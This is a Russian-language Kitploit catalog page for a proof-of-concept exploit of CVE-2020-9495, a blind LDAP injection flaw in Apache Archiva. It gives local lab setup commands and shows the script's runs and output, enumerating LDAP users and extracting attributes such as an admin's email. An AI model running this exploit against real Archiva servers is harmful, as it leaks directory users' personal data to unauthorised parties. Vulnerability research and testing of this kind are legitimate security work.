Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-9495 — Эксплойт-доказательство концепции для CVE-2020-9495, уязвимости LDAP-инъекции в Apache Archiva. Перечисляет пользователей LDAP и извлекает произвольные значения атрибутов через слепую инъекцию. | Kitploit
Инструменты/GitHubGitHub/ggolawski/cve-2020-9495
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubggolawski/cve-2020-9495

CVE-2020-9495

Эксплойт-доказательство концепции для CVE-2020-9495, уязвимости LDAP-инъекции в Apache Archiva. Перечисляет пользователей LDAP и извлекает произвольные значения атрибутов через слепую инъекцию.

Репозиторий
81126 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-9495 PoC

CVE-2020-9495 — это уязвимость LDAP-инъекции средней степени опасности в Apache Archiva версий до 2.2.5. Она позволяет злоумышленнику получить любые значения атрибутов LDAP пользователей, существующих на LDAP-сервере.

Из официального уведомления Apache Archiva:

Предоставляя специальные значения в форму входа Archiva, злоумышленник может получить данные атрибутов пользователя с подключённого LDAP-сервера. С определёнными символами можно изменить LDAP-фильтр, используемый для запроса пользователей на подключённом LDAP-сервере. Измеряя время отклика, можно получить произвольные данные атрибутов из объектов пользователей LDAP.

PoC

Сценарий poc.py демонстрирует, как неавторизованный злоумышленник может перечислить пользователей на LDAP-сервере, интегрированном с Archiva, и получить значение любого атрибута любого пользователя.

Локальный тестовый сервер Archiva

Пропустите этот шаг, если у вас уже есть сервер Archiva с включённой аутентификацией LDAP.

  1. Скачайте Archiva 2.2.4 и распакуйте его

    root@kitploit:~
    $ wget https://archive.apache.org/dist/archiva/2.2.4/binaries/apache-archiva-2.2.4-bin.tar.gz
    $ tar -zxf apache-archiva-2.2.4-bin.tar.gz
    

Запустите сервер OpenLDAP

root@kitploit:~
$ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
  • Импортируйте пользователей из users.ldif в LDAP

    root@kitploit:~
    $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
    
  • Запустите сервер Archiva

    root@kitploit:~
    $ bin/archiva console
    
  • Включите и настройте аутентификацию LDAP через веб-интерфейс

  • Перечисление пользователей

    root@kitploit:~
    $ ./poc.py --url http://127.0.0.1:8080
    [INFO] Enumerating users from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    admin1
    admin2
    admin3
    admin4
    admin5
    admin6
    admin7
    user1
    user2
    user3
    user4
    

    Получение значений атрибутов LDAP пользователя admin1

    root@kitploit:~
    $ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr mail
    [INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    [email protected]
    $ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr givenName
    [INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    admin1
    $ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr sn
    [INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    last
    
    Скачать инструмент